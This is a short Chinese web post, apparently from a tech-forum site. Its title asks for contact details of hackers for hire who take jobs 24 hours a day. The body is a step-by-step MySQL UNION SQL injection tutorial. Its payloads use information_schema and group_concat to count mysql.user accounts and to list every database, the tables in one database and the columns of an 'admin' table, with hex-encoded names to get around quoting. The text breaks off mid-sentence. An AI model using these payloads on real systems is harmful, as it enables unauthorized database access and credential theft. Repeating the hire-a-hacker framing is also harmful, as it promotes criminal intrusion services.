谁知道24小时接单的黑客的联系方式?

谁知道24小时接单的黑客的联系方式?利用Information_schema系统库来注入,配合使用group_concat()函数,group_concat()功能强大,而且能够绕过limit限制 http://127.0.0.1/sql.php?id=1 union select 0,0,0 字段为 3 http://127.0.0.1/sql.php?i

利用Information_schema系统库来注入,配合使用group_concat()函数,group_concat()功能强大,而且能够绕过limit限制 

http://127.0.0.1/sql.php?id=1 union select 0,0,0 字段为 3 
http://127.0.0.1/sql.php?id=1 and 1=2 union select count(*),1,1 from mysql.user 统计数据库中又多少个用户 


http://127.0.0.1/sql.php?id=1 and 1=2 union select 1,2,group_concat(schema_name) from information_schema.schemata 测试过程中只有 root权限或者 全局权限才能爆出所有数据库 普通用户不能爆出所有用户 
这样就把mysql服务器所有数据库名字显示出来了 

http://127.0.0.1/sql.php?id=1 and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=0x74657374 
这样就能把 test 数据库中的 所有表显示出来了。 其中 0x74657374 为 test 的 hex 值 


http://127.0.0.1/sql.php?id=1 and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x61646D696E 
这样就把admin表中所有的字段名 显示出来了。 

这样注入手法很灵活的。突破了 limit 限制了。 
来看下 穿山甲的注入语句 

  • 发表于 2021-04-03 12:25
  • 阅读 ( 193 )
  • 分类:互联网

0 条评论

请先 登录 后评论
net.satkkill
net.satkkill

753 篇文章

你可能感兴趣的文章

相关问题